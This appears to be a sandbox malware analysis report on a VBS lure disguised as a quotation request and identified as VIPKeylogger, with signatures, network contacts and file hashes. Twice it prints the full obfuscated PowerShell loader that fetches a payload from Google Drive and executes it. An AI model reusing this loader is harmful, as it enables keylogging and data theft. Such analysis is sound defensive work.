Analysis Overview
SHA256
400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741
Threat Level: Known bad
The file Pedido de Cotação-24100004_lista comercial.vbs was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Network Service Discovery
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Command and Scripting Interpreter: PowerShell
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-23 14:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-23 14:46
Reported
2024-10-23 14:48
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.73:80 | crl.microsoft.com | tcp |
Files
memory/2672-4-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp
memory/2672-6-0x0000000002340000-0x0000000002348000-memory.dmp
memory/2672-5-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2672-7-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-8-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-9-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-10-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-12-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp
memory/2672-13-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-15-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MHP6VHWR454BS9L5LFT.temp
| MD5 | 53eb1a2da1daa6ff5f0ececcca12b7ef |
| SHA1 | 25998cd34dffa6cbdf55b227ab1a7fe728859e15 |
| SHA256 | 0366a5fb82142abd3491d6a802fb3599f42f168b2311158c1b9eb342f1d30bfa |
| SHA512 | 46e1454dd024b8f56aa31b5c5ab6d33d26da1cc43cf0d6253763d9ee5fadaa425652bfde4d0c08a6a71505f4b91d283589fd472174a63d55c4956e60b325da21 |
C:\Users\Admin\AppData\Roaming\Symbolerne.rab
| MD5 | 4fa4bfe12534bd26a9e268a1e659e510 |
| SHA1 | f42014f4e7c0f11f4bb5f559c88310eb6db186a3 |
| SHA256 | 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0 |
| SHA512 | 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01 |
memory/2972-19-0x00000000065E0000-0x000000000B7C9000-memory.dmp
memory/1856-20-0x00000000004D0000-0x0000000001532000-memory.dmp
memory/1856-42-0x00000000004D0000-0x0000000001532000-memory.dmp
memory/1856-43-0x00000000004D0000-0x0000000000518000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-23 14:46
Reported
2024-10-23 14:48
Platform
win10v2004-20241007-en
Max time kernel
135s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\msiexec.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
